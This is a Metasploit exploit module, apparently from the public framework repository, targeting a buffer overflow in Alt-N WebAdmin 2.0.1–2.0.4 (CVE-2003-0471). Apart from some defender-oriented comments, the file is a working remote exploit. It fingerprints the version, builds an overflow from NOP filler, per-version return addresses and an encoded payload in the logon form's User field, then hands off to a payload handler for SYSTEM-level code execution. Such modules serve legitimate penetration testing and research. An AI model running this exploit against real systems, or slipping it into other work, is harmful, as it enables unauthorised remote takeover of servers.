rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/altn_webadmin.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
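# Metasploit module for the Alt-N WebAdmin USER-parameter buffer overflow
# (CVE-2003-0471). The builds it carries targets for are WebAdmin 2.0.1
# through 2.0.4.
#
# Reviewer notes for defenders:
# - The trigger is the logon request itself: a POST to
#   /WebAdmin.DLL?View=Logon whose "User" form field holds up to about a
#   kilobyte of binary data (168 filler bytes, a 4-byte address, then the
#   payload) instead of a username. A length or character-class check on
#   that field at a proxy or IDS is enough to flag it.
# - In Automatic mode the logon request is preceded by a plain request for
#   /WebAdmin.DLL, which is used to read the version banner.
# - The service is addressed on TCP port 1000 by default (RPORT below);
#   restricting access to that port limits exposure.
# - 'Privileged' => true reflects the description: the service runs with
#   SYSTEM privileges, so a successful overflow yields SYSTEM-level code
#   execution. See the references for vendor and scanner guidance.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata (references, payload constraints and
  # per-version targets) and the default remote port.
  #
  # @param info [Hash] metadata supplied by the framework, merged through
  #   update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Alt-N WebAdmin USER Buffer Overflow',
        'Description' => %q{
          Alt-N WebAdmin is prone to a buffer overflow condition. This
          is due to insufficient bounds checking on the USER
          parameter. Successful exploitation could result in code
          execution with SYSTEM level privileges.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2003-0471' ],
          [ 'OSVDB', '2207' ],
          [ 'BID', '8024'],
          [ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=11771']
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 830,
          # Bytes the encoder must avoid in the payload.
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        # Index 0 is the fingerprinting pseudo-target and carries no 'Ret';
        # exploit maps a detected version onto indices 1-4.
        'Targets' => [
          ['Automatic', {}],
          ['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll
          ['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll
          ['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll
          ['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2003-06-24',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(1000)])
  end

  # Resolves the target (fingerprinting the version banner when the
  # Automatic target is selected), sends the logon POST and hands over to
  # the payload handler.
  #
  # Returns early, without sending the logon request, whenever no concrete
  # target could be selected.
  def exploit
    mytarget = target

    if target.name =~ /Automatic/
      res = send_request_raw({ 'uri' => '/WebAdmin.DLL' }, -1)

      if res && res.body =~ /WebAdmin.*v(2\..*)$/
        # Keep the captured version in a local: each `when` regex below
        # replaces the last-match data, so $1 would no longer hold the
        # version by the time the error message is formatted.
        version = Regexp.last_match(1)

        case version
        when /2\.0\.4/
          mytarget = targets[1]
        when /2\.0\.3/
          mytarget = targets[2]
        when /2\.0\.2/
          mytarget = targets[3]
        when /2\.0\.1/
          mytarget = targets[4]
        else
          print_error("No target found for v#{version}")
          return
        end
      else
        # Stop here. The Automatic entry has no 'Ret', so carrying on would
        # leave mytarget.ret without an address to pack and the run would
        # end in an exception instead of a clean abort.
        print_error("No target found")
        return
      end
    end

    user_cook = rand_text_alphanumeric(2)

    # Logon form body: the User field is filler, the selected return
    # address as a 32-bit little-endian value, then the encoded payload.
    post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded
    post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'

    print_status("Sending request...")
    send_request_cgi({
      'uri' => '/WebAdmin.DLL',
      'query' => 'View=Logon',
      'method' => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",
      'data' => post_data,
      'headers' => {
        'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
        'Accept-Language' => 'en',
        'Accept-Charset' => 'iso-8859-1,*,utf-8'
      }
    }, 5)

    handler
  end
end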